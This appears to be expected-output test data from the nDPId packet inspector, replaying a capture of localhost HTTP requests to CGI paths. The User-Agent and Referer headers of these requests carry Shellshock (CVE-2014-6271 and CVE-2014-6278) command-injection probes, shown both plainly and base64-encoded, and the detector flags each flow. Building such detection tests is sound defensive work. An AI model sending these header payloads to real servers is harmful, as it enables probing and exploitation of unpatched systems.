+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} 
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
